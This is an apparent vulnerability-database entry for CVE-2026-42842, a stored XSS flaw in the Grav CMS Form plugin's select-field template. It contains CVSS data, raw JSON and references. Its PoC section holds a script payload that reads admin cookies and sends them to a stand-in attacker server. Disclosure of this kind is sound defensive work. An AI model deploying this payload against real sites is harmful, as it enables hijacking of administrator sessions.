Security Vulnerability Report
中文
CVE-2026-42842 CVSS 5.4 MEDIUM

CVE-2026-42842

Published: 2026-05-11 17:16:34
Last Modified: 2026-05-11 19:16:24
Source: [email protected]

Description

The form plugin for Grav adds the ability to create and use forms. Prior to 9.1.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig |raw filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel. This vulnerability is fixed in 9.1.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Grav CMS Form Plugin < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-42842: Stored XSS in Grav CMS Form Plugin Description: Inject this payload into the Select field (Taxonomy/Category values) in the Form plugin configuration. --> <script> // Example payload: Steal admin cookies (function(){ var cookies = document.cookie; var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker-controlled-server/log?c=' + encodeURIComponent(cookies), true); xhr.send(); alert('XSS Triggered - CVE-2026-42842'); })(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42842", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:33.873", "lastModified": "2026-05-11T19:16:24.190", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The form plugin for Grav adds the ability to create and use forms. Prior to 9.1.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig |raw filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel. This vulnerability is fixed in 9.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957", "source": "[email protected]"}, {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f", "source": "[email protected]"}, {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.